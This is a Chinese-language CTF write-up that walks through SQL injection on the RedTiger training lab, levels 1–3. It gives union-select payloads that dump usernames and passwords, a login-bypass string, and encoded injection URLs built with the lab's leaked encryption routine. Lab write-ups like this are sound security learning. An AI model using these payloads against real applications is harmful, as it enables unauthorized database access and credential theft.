对SQL注入的理解还是不能上升到一定高度,也只能通过不停的刷题,来扩宽自己的知识面……终究还是太菜了!!
level 1
http://redtiger.labs.overthewire.org/level1.php
上来寻找注入点,看到Category:后面的“1”是个跳转,点了一下就得到"cat=1"
于是就开始尝试。。结果发现。。只是数字型注入,不用闭合‘ “ ) ……,所以直接按照提示构造payload就ok了!
- order by
- 查flag
http://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
level 2
http://redtiger.labs.overthewire.org/level2.php
这也是一个比较简单的题了。
提示也给了“A simple loginbypass”
一来就用万能密码呗!
万能用户名不行,那就试试万能密码呗。然后就拿到flag了
username=admin&password=1'or 1=1#&login=Login
level 3
Hint: Try to get an error. Tablename: level3_users
估计就是报错注入呗~
但是好像思路不对。。。然后试了半天,没试出来,就去看看大佬的wp,才知道,是要报错。。但是这个报错点也太。。。。。又学了一波新知识~
报错:将usr变为一个数组,然后进行提交。
错误顺利抛出:
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25
然后得到关于.inc的一些资料:
.inc 文件,顾名思义就是include file,实际上文件的后缀对于文件包含是无所谓,你可以包含一个asp文件,也可以包含txt文。一般我们使用inc作为后缀,是因为这样能体现该文件的作用。
然后就去把源码down下来
<?php
// warning! ugly code ahead :)
// 加密函数
function encrypt($str)
{
$cryptedstr = "";
srand(3284724);
for ($i =0; $i < strlen($str); $i++)
{
$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
while(strlen($temp)<3)
{
$temp = "0".$temp;
}
$cryptedstr .= $temp. "";
}
return base64_encode($cryptedstr);
}
# 解密函数
function decrypt ($str)
{
srand(3284724);
if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
{
$str = base64_decode($str);
if ($str != "" && $str != null && $str != false)
{
$decStr = "";
for ($i=0; $i < strlen($str); $i+=3)
{
$array[$i/3] = substr($str,$i,3);
}
foreach($array as $s)
{
$a = $s ^ rand(0, 255);
$decStr .= chr($a);
}
return $decStr;
}
return false;
}
return false;
}
?>
告诉了加解密的算法,那样不就简单了嘛,跟第一题的思路一样,就可以拿到用户名和密码了。
但是后来加密了之后发现死活查询不出来。。然后又查了一波资料。。。得知win和linux下加密出来的字符串是不一样的。因为windows和linux对于相同的srand()种子下rand()得出的随机数不一样,导致加密函数只在linux下有效。最后改在docker里面运行加密函数,继续下面的过程
# order by
original:
https://redtiger.labs.overthewire.org/level3.php?usr=Admin' order by 6
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMzMDY4MTc1MDg5
original:
https://redtiger.labs.overthewire.org/level3.php?usr=Admin' order by 7
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY4MTc1MDg5
# order by 会报错,不晓得为啥,但是union就查询正常~~
# union 查回显
original:
https://redtiger.labs.overthewire.org/level3.php
?usr=' union select 1,2,3,4,5,6,7'
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDc2MTk0MDEzMTgyMTQxMjMxMjIzMDc1MTk5MTA5MTg0MTU5MDkzMjM5MDc4MDczMjM3MDc3MTc0MDcwMDU3MTk5MjM0MjE5MDgyMjQ2MTUzMjE5
# 查用户名和密码
original:
https://redtiger.labs.overthewire.org/level3.php?usr=' union select 1,username,3,4,5,password,7 from level3_users where username='Admin
encode:
https://redtiger.labs.overthewire.org/level3.php
?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDIwMjM4MDE1MTI3MTMzMTkwMTU0MDAxMjQ2MTU3MjA4MTc3MDk2MTI4MjIwMTE2MTIxMTYzMTQ5MjEzMTYwMTA4MDMyMjUyMjAzMDk3MTU2MTkwMTc1MDEzMTM5MDc4MTU1MDk2MDg1MTM0MTk3MTE5MDU5MTYzMTc4MDU2MDM3MDAzMTM2MDQ3MDY2MTA2MTE0MDQ2MjA2MTQ4MDcyMTQxMjE0MDc1MDQ0MjE1MjAzMDM3MDgyMTk4MDcyMTIzMjE1